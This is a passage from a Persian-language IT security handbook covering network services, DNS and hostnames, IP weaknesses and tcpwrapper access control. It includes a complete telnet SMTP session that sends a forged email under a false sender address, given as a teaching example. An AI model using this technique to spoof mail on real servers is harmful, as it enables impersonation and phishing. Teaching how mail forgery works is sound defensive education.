‫ﻫﺴﺘﻨﺪ ﺑﻪ ‪ daemon‬ﻣﺸﻬﻮﺭﻧﺪ ﻭ ﺩﺭ ﺩﻧﻴﺎﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﻪ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ‪) service‬ﺧﺪﻣﺖ( ﮔﻔﺘﻪ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ‪ telnet‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻫﺮ ﭘﻮﺭﺕ ﺩﻟﺨﻮﺍﻩ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻣﺘﺼﻞ ﺷﻮﻳﺪ‪ ٢٩٢.‬ﻣﺜ ﹰ‬
‫ﻼ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﻮﺭﺕ ‪) ٢٥‬ﭘﻮﺭﺕ ‪(SMTP‬‬
‫ﻣﺘﺼﻞ ﺷﻮﻳﺪ ﺗﺎ ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻠﻲ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ‪ ،‬ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺟﻌﻠﻲ ﺑﻔﺮﺳﺘﻴﺪ‪:‬‬
‫‪% telnet control.mil 25‬‬
‫‪Trying 45.1.12.2 ...‬‬
‫‪Connected to hq.control.mil.‬‬
‫‪Escape character is '^]'.‬‬
‫‪220 hq.control.mil ESMTP Sendmail 8.11.6/8.11.6; Sun, 18 Aug 2002 21:21:03 –0500‬‬
‫‪HELO kaos.org‬‬
‫‪250 hq.control.mil Hello kaos.org, pleased to meet you‬‬
‫>‪MAIL FROM:<agent86@control.mil‬‬
‫‪250 <agent86>... Sender ok‬‬
‫>‪RCPT TO:<agent99@control.mil‬‬
‫‪550 <agent99>... Recipient ok‬‬
‫‪DATA‬‬
‫‪354 Enter mail, end with “.” on a line by itself‬‬
‫‪To: agent99‬‬
‫>‪From: Max <agent86‬‬
‫‪Subject: tonight‬‬

‫‪99, I know I was supposed to take you out to dinner tonight, but I have been captured by KAOS‬‬
‫‪agents, and they‬‬
‫‪won't let me out until they finish torturing me. I hope you understand. Love, Max‬‬
‫‪.‬‬
‫‪250 UAA01441 Message accepted for delivery‬‬
‫‪QUIT‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫‪221 hq.control.mil closing connection‬‬


‫‪Connection closed by foreign host.‬‬
‫‪%‬‬

‫ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﻭ ‪DNS‬‬

‫"ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ" ﻧﺎﻣﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻧﺴﺒﺖ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺁﺳﺎﻧﺘﺮ‬
‫ﻣﻲﺳﺎﺯﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﺑﺨﺎﻃﺮ ﺳﭙﺮﺩﻥ ﺁﻥ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩﺗﺮ ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻥ ﺁﺩﺭﺱ ‪ IP‬ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﺍﺩ ﺍﻣﺎ ﻧﺎﻡ‬
‫ﻣﻴﺰﺑﺎﻥ ﺁﻧﺮﺍ ﺑﻪ ﻫﻤﺎﻥ ﻧﺎﻡ ﻗﺒﻠﻲ ﺑﺎﻗﻲ ﮔﺬﺍﺷﺖ‪ .‬ﻳﻚ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﺁﺩﺭﺱ ‪ IP‬ﺗﻌﻠﻖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﻳﻚ ﺁﺩﺭﺱ ‪IP‬‬
‫ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﺩﻭ ﻣﻮﺭﺩ ﺑﺮ ﻛﺎﺭ ﻛﺴﺎﻧﻴﻜﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ﺍﻳﻤﻦ ﺑﻨﻮﻳﺴﻨﺪ ﺗﺄﺛﻴﺮﺍﺕ‬
‫ﻋﻤﻴﻘﻲ ﻣﻲﮔﺬﺍﺭﻧﺪ‪.‬‬

‫‪ ۲۹۲‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺑﻤﻨﻈﻮﺭ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑﻜﺎﺭ ﻣﻲﺭﻓﺖ‪ ،‬ﻭﻟﻲ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﺑﺼﻮﺭﺕ ﺭﻣﺰﻧﺸﺪﻩ ﻣﻲﻓﺮﺳﺘﺪ‪ ،‬ﺍﻳﻦ ﻛﺎﺭﺑﺮﺩ ‪ telnet‬ﺩﻳﮕﺮ ﺑﻬﻴﭽﻮﺟـﻪ‬
‫ﺗﻮﺻﻴﻪ ﻧﻤﻲﺷﻮﺩ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٠٢‬‬

‫ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺑﺎﻳﺪ ﺑﺎ ﻳﻚ ﺣﺮﻑ ﻳﺎ ﻳﻚ ﺷﻤﺎﺭﻩ ﺁﻏﺎﺯ ﺷﻮﺩ ﻭ ﺩﺭ ﺍﺩﺍﻣﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺣﺎﻭﻱ ﺣﺮﻭﻑ‪ ،‬ﺷﻤﺎﺭﻩ ﻭ ﻳﺎ ﺑﺮﺧﻲ ﻧﻤﺎﺩﻫﺎ ﻫﻤﭽﻮﻥ ﺧﻂ ﻓﺎﺻﻠﻪ‬
‫‪٢٩٣‬‬
‫ﺑﺎﺷﺪ‪ .‬ﺣﺮﻭﻑ ﻛﻮﭼﻚ ﻭ ﺑﺰﺭﮒ ﺩﺭ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺗﻔﺎﻭﺗﻲ ﻧﺪﺍﺭﻧﺪ‪ .‬ﻣﺜﺎﻟﻲ ﺍﺯ ﻳﻚ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ‪tock.cerias.purdue.edu‬‬
‫‪٢٩٤‬‬
‫ﺍﺳﺖ‪.‬‬
‫ﻫﺮ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺍﺯ ﺩﻭ ﺑﺨﺶ ﺗﺸﻜﻴﻞ ﺷﺪﻩ‪ :‬ﻧﺎﻡ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﻭ ﻧﺎﻡ ﺩﺍﻣﻨﺔ ﺁﻥ‪ .‬ﻧﺎﻡ ﺭﺍﻳﺎﻧﻪ ﺍﺳﻤﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺳﻤﺖ ﭼﭗ ﻧﻘﻄﺔ ﺍﻭﻝ ﺍﺳﺖ؛ ﻭ ﻧﺎﻡ‬
‫ﺩﺍﻣﻨﻪ ﻧﻴﺰ ﻫﻤﺔ ﺁﻥ ﭼﻴﺰﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺳﻤﺖ ﺭﺍﺳﺖ ﺁﻥ ﻧﻘﻄﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺑﺮﺍﻱ ﻧﻤﻮﻧﻪ ﺩﺭ ﻣﺜﺎﻝ ﻗﺒﻞ ﻧﺎﻡ ﺭﺍﻳﺎﻧﻪ ‪ tock‬ﻭ ﻧﺎﻡ ﺩﺍﻣﻨﺔ ﺁﻥ‬
‫‪ cerias.purdue.edu‬ﺍﺳﺖ‪ .‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺩﺭ ﺧﻮﺩ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ﻧﻘﻄﻪ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺁﻥ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ﻧﻤﺎﻳﺎﻧﮕﺮ ﺳﻠﺴﻠﻪﻣﺮﺍﺗﺒﻲ ﺍﺯ ﺩﺍﻣﻨﻪﻫﺎ‬
‫ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ‪ cerias.purdue.edu‬ﻣﻌﺮﻑ ﺩﺍﻣﻨﺔ ﻣﺮﻛﺰ ‪ CERIAS‬ﺍﺳﺖ ﻛﻪ ﺑﺨﺸﻲ ﺍﺯ ﺩﺍﻣﻨﺔ ﺩﺍﻧﺸﮕﺎﻩ ‪ Purdue‬ﺭﺍ‬
‫ﺗﺸﻜﻴﻞ ﻣﻲﺩﻫﺪ‪ ،‬ﻭ ﺑﻪ ﻧﻮﺑﺔ ﺧﻮﺩ ﺑﺨﺸﻲ ﺍﺯ ﺩﺍﻣﻨﺔ ﺳﻄﺢ ﺑﺎﻻﺗﺮ ﻣﺆﺳﺴﺎﺕ ﺁﻣﻮﺯﺷﻲ )‪ (edu‬ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺩﺭ ﺁﻏﺎﺯ ﭘﻴﺪﺍﻳﺶ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﻫﻤﺔ ﻧﺎﻣﻬﺎ ﻭ ﺁﺩﺭﺳﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﻭﺍﺣﺪ ﺑﻮﺩ‪ .‬ﺍﻣﺎ ﺑﺎ ﺑﺰﺭﮒ ﺷﺪﻥ ﺍﻧﺪﺍﺯﺓ ﻓﺎﻳﻞ ﺑﻪ ﻫﺰﺍﺭﺍﻥ‬
‫ﻼ ﻏﻴﺮﻣﻤﻜﻦ ﺷﺪ ﻭ ﺑﺠﺎﻱ ﺁﻥ ﻳﻚ‬ ‫ﺧﻂ ﻭ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺗﻐﻴﻴﺮ ﺩﺭ ﻓﻬﺮﺳﺖ ﻧﺎﻣﻬﺎ ﻛﻢ ﻛﻢ ﺑﻪ ﺍﻣﺮﻱ ﺭﻭﺯﺍﻧﻪ ﺗﺒﺪﻳﻞ ﺷﺪ‪ ،‬ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻱ ﺁﻥ ﻋﻤ ﹰ‬
‫ﺳﺮﻭﻳﺲ ﺗﻮﺯﻳﻊﺷﺪﺓ ﻧﺎﻡ ﻣﺒﺘﻨﻲ ﺑﺮ ﺷﺒﻜﻪ ﺑﻮﺟﻮﺩ ﺁﻣﺪ ﻛﻪ ﺧﺪﻣﺎﺕ ﻧﺎﻡ ﺩﺍﻣﻨﻪ )‪ (DNS‬ﻧﺎﻡ ﮔﺮﻓﺖ‪.‬‬
‫ﺩﺭ ‪ ،DNS‬ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺑﺮﺍﻱ ﺗﺮﺟﻤﺔ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺑﻪ ﺁﺩﺭﺱ ‪ IP‬ﻭ ﺑﺎﻟﻌﻜﺲ ﻭ ﺍﻧﺠﺎﻡ ﺍﻋﻤﺎﻝ ﻣﺮﺑﻮﻃﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﺗﺮﺟﻤﺔ ﻫﺮ ﺑﺨﺶ ﺍﺯ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ‪ ،‬ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺑﻄﻮﺭ ﻣﺠﺰﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﺮﺍﻱ‬
‫ﺗﺮﺟﻤﺔ ﻧﺎﻡ ‪ girigiri.gbrmpa.gov.au‬ﺍﺑﺘﺪﺍ ﺁﺩﺭﺱ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ﻧﺎﻡ )ﻛﻪ ﻣﻌﻤﻮ ﹰﻻ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﺫﺧﻴﺮﻩ ﺷﺪﻩ( ﺭﺍ ﻣﻲﺟﻮﻳﺪ ﻭ ﺍﺯ‬
‫ﺁﻥ ﺁﺩﺭﺱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺩﺍﻣﻨﺔ ﺳﻄﺢ ﺑﺎﻻﻱ ‪ au‬ﺭﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻲﻛﻨﺪ‪ .‬ﺳﭙﺲ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﺓ ﺩﺍﻣﻨﺔ ‪ au‬ﺩﺭ ﻣﻮﺭﺩ ﺁﺩﺭﺱ‬
‫‪ gov.au‬ﺳﺆﺍﻝ ﻣﻲﻛﻨﺪ ﻭ ﺑﺎ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﺁﻥ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺁﺩﺭﺱ ‪ gbrmpa.gov.au‬ﺭﺍ ﺍﺯ ﺁﻥ ﻣﻲﭘﺮﺳﺪ‪ ،‬ﻭ ﺩﺭ ﻧﻬﺎﻳﺖ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺩﺍﻣﻨﺔ‬
‫‪ gbrmpa.gov.au‬ﺁﺩﺭﺱ ﺭﺍﻳﺎﻧﺔ ‪ girigiri.gbrmpa.gov.au‬ﺭﺍ ﺟﻮﻳﺎ ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﺗﺮﺟﻤﺔ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺑﻪ ﺁﺩﺭﺱ ‪ ،IP‬ﺍﻧﻮﺍﻉ‬
‫ﻣﺨﺘﻠﻔﻲ ﺍﺯ ﺗﻜﻨﻴﻜﻬﺎﻱ ‪ caching‬ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﺗﺮﺍﻓﻴﻚ ﻛﻠﻲ ﺷﺒﻜﻪ ﻧﻴﺰ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﻻ ﺑﻮﺳﻴﻠﺔ ﺑﺴﺘﻪﻫﺎﻱ ‪ UDP‬ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴﺮﺩ‪ ،‬ﺍﻣﺎ ‪ DNS‬ﺑﺮﺍﻱ ﺑﻌﻀﻲ ﺍﺯ ﻋﻤﻠﻴﺎﺕ ﺧﻮﺩ ﺍﺯ‬
‫ﺟﺴﺘﺠﻮﻫﺎﻱ ‪ DNS‬ﺑﺪﻧﺒﺎﻝ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻧﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫‪ TCP‬ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪.‬‬

‫ﺍﻣﻨﻴﺖ ‪IP‬‬

‫ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﭘﺮﻭﺗﻜﻞ ‪ IP‬ﺩﺭ ﻣﻘﺎﺑﻞ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺍﺯ ﺟﻤﻠﻪ ﺣﺪﺱ ﺯﺩﻥ ﺭﻣﺰ ﻋﺒﻮﺭ‪ ،‬ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ‪ ،‬ﺍﺷﻜﺎﻻﺕ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‪ ،‬ﺩﻳﺪﻩﺑﺎﻧﻲ ﺷﺒﻜﻪ‪ ،‬ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﺑﺴﺘﻪ‪ ،‬ﺩﺳﺘﻜﺎﺭﻱ ﺩﺍﺩﻩﻫﺎ‪ ،‬ﺭﺑﻮﺩﻥ ﺍﺗﺼﺎﻝ‪ ،‬ﻭ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳﺖ‪ .‬ﺑﺴﻴﺎﺭﻱ‬
‫ﺍﺯ ﺍﻳﻦ ﺣﻤﻼﺕ ﺳﺎﻟﻬﺎ ﭘﻴﺶ ﺍﺯ ﺍﻳﻨﻜﻪ ﺩﺭ ﻋﻤﻞ ﺭﺥ ﺩﻫﻨﺪ ﭘﻴﺶﺑﻴﻨﻲ ﺷﺪﻩ ﺑﻮﺩﻧﺪ‪ ،‬ﻭ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻠﻬﺎ ﻫﻨﻮﺯ ﺗﺪﺑﻴﺮ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ‬
‫ﺣﻔﺎﻇﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﻧﻬﺎ ﻧﺪﺍﺭﻧﺪ‪.‬‬
‫‪ IP‬ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴﺖ ﻃﺮﺍﺣﻲ ﻧﺸﺪﻩ ﻭ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ ﻋﻤﺪﻱ ﻣﻘﺎﻭﻡ ﻧﻴﺴﺖ‪ ،‬ﺍﻣﺎ ﺑﺎ ﺗﻜﻨﻴﻜﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﻣﻲﺗﻮﺍﻥ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪﻫﺎﻱ ‪IP‬‬
‫ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﺗﻜﻨﻴﻜﻬﺎ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﺭﻣﺰﻧﮕﺎﺭﻱ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﭘﻴﺸﺮﻓﺘﻪ‪ ،SSH ،‬ﻭ‬
‫ﻼ ﺑﻪ ﺗﻔﺼﻴﻞ ﺷﺮﺡ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﺍﻗﺪﺍﻣﺎﺗﻲ ﭼﻮﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬ ‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ )ﻛﻮﺯﻩﻫﺎﻱ ﻋﺴﻞ(‪ .‬ﻫﺮ ﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺫﻳ ﹰ‬
‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ )ﻛﻪ ﭘﻴﺸﺘﺮ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪ(‪ ،‬ﻣﻘﺎﻭﻡ ﺳﺎﺧﺘﻦ ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ )ﻛﻪ ﺩﺭ ﻓﺼﻞ ‪ ٥‬ﺍﺯ ﻫﻤﻴﻦ ﺑﺨﺶ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺖ(‪ ،‬ﻭ‬
‫ﺟﺪﺍ ﻛﺮﺩﻥ ﻓﻴﺰﻳﻜﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺯ ﺷﺒﻜﻪ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺑﺎﻻ ﺑﺮﺩﻥ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪.‬‬

‫‪ ۲۹۳‬ﺍﺯ ﻧﻈﺮ ﻓﻨﻲ‪ ،‬ﻧﺎﻡ ﻣﻴﺰﺑﺎﻧﻬﺎ ﻧﺒﺎﻳﺪ ﺣﺎﻭﻱ ﺯﻳﺮﺧﻂ ﺑﺎﺷﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻧﻬﺎ ﺭﺍ ﺑﻪ ﺁﺩﺭﺱ ‪ IP‬ﻧﮕﺎﺷﺖ ﻣﻲﻛﻨﻨﺪ ﺑﻄﻮﺭ ﻟﺠﻮﺟﺎﻧﻪ ﺯﻳﺮﺧﻂ ﺭﺍ ﻗﺒﻮﻝ‬
‫ﻣﻲﻛﻨﻨﺪ ﻭ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻧﻴﺰ ﺩﺭ ﺳﺮﻭﻳﺲ ‪ Active Directory‬ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺭﺍ ﺍﻟﺰﺍﻣﻲ ﻛﺮﺩﻩ‪ ،‬ﻛﻪ ﺍﻳﻦ ﺍﻣﺮ ﺑﺮﺧﻼﻑ ﺣﺪﺍﻗﻞ ﻳﻚ ‪ RFC‬ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫‪ ۲۹۴‬ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ‪RFC‬ﻫﺎﻱ ﺷﻤﺎﺭﺓ ‪ ۱۱۲۲‬ﻭ ‪ ۱۱۲۳‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪.‬‬
‫‪٤٠٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑﺮﻧﺎﻣﻪ‬


‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺷﺒﻜﻪ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﻛﻪ ﺗﻌﻴﻴﻦ ﻣﻲﻛﻨﻨﺪ ﻛﺪﺍﻡ ﻣﻴﺰﺑﺎﻧﻬﺎ ﺍﺟﺎﺯﺓ ﺍﺗﺼﺎﻝ ﺑﻪ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺩﺍﺭﻧﺪ‬
‫ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩ‪) .‬ﺩﺭ ﻳﻚ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺑﺎ ﺍﻣﻨﻴﺖ ﻛﻤﺘﺮ ﻛﻪ ﺭﻭﺍﺝ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺭﺩ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﺗﻌﻴﻴﻦ ﻛﺮﺩ ﻛﻪ ﭼﻪ ﻣﻴﺰﺑﺎﻧﻬﺎﻳﻲ ﺍﺟﺎﺯﺓ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺭﺍ ﻧﺪﺍﺭﻧﺪ‪(.‬‬
‫ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﻳﻚ ﻣﻜﺎﻧﻴﺰﻡ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑﺮﺍﻱ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺣﻮﻝ ﻳﻚ ﻧﻮﻉ ﺧﺎﺹ ﺍﺯ ﺳﻴﺴﺘﻢ ‪ ٢٩٥tcpwrapper‬ﻭﺟﻮﺩ‬
‫ﺩﺍﺭﺩ‪ .‬ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﻣﺘﺸﻜﻞ ﺍﺳﺖ ﺍﺯ ﻳﻚ ﻛﺘﺎﺑﺨﺎﻧﻪ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﻛﻨﺘﺮﻝ ﺩﺳﺘﻴﺎﺑﻲ )‪ ،(lipwrap‬ﻳﻚ ﺑﺮﻧﺎﻣﺔ ‪ wrapper‬ﺑﺮﺍﻱ ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ‬
‫ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻛﺘﺎﺑﺨﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻨﺪ )‪ ،(tcpd‬ﻭ ﺩﻭ ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ‬
‫)‪ etc/hosts.allow‬ﻭ ‪ .(/etc/hosts.deny‬ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺟﺪﻳﺪ‪ /etc/hosts.deny ،‬ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻳﻚ ﺿﺎﺑﻄﺔ ﻣﻨﻊ ﻫﻤﻪﮔﻴﺮ )”‪(”ALL:ALL‬‬
‫ﻭ ‪ /etc/hosts.allow‬ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﺿﻮﺍﺑﻄﻲ ﺑﺮﺍﻱ ﺍﺟﺎﺯﺓ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺧﺪﻣﺎﺕ ﺧﺎﺹ ﺗﻮﺳﻂ ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺑﺎﺷﺪ‪.‬‬
